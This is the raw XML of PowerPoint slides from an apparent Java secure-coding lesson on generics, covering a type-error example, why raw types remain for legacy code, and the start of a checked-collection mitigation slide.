        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ListUtility</a:t>
            </a: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private static void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addToList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(List&lt;String&gt; list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>list.add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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public static void main(String[] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>args</a:t>
            </a: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List&lt;String&gt; list = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ArrayList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;String&gt; ();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addToList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(list, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>42)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>System.out.println</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>list.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(0));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="3810000"/>
            <a:ext cx="2286000" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -134854"/>
              <a:gd name="adj2" fmla="val -30989"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="292100" algn="l"/>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Compiler error, can’t add </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Integer </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> List&lt;String&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="2209800"/>
            <a:ext cx="3886200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -77129"/>
              <a:gd name="adj2" fmla="val -23949"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>No more compiler warning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="5257800"/>
            <a:ext cx="5486400" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -40622"/>
              <a:gd name="adj2" fmla="val -3855"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Program compiles and runs correctly if we replace 42 with a string, e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>42"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8343827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dissolve">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Legacy Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ListUtility</a:t>
            </a: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private static void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addToList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(List list, Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>obj</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>list.add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>obj</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> // . . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" kern="1200" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Raw types were left in Java to prevent legacy code from breaking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" kern="1200" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>So what if we couldn’t modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addToList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="1200" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" kern="1200" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42943730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Mitigation: Checked Collection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ListUtility</a:t>
            </a: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chemeClr val="bg2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  private static void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
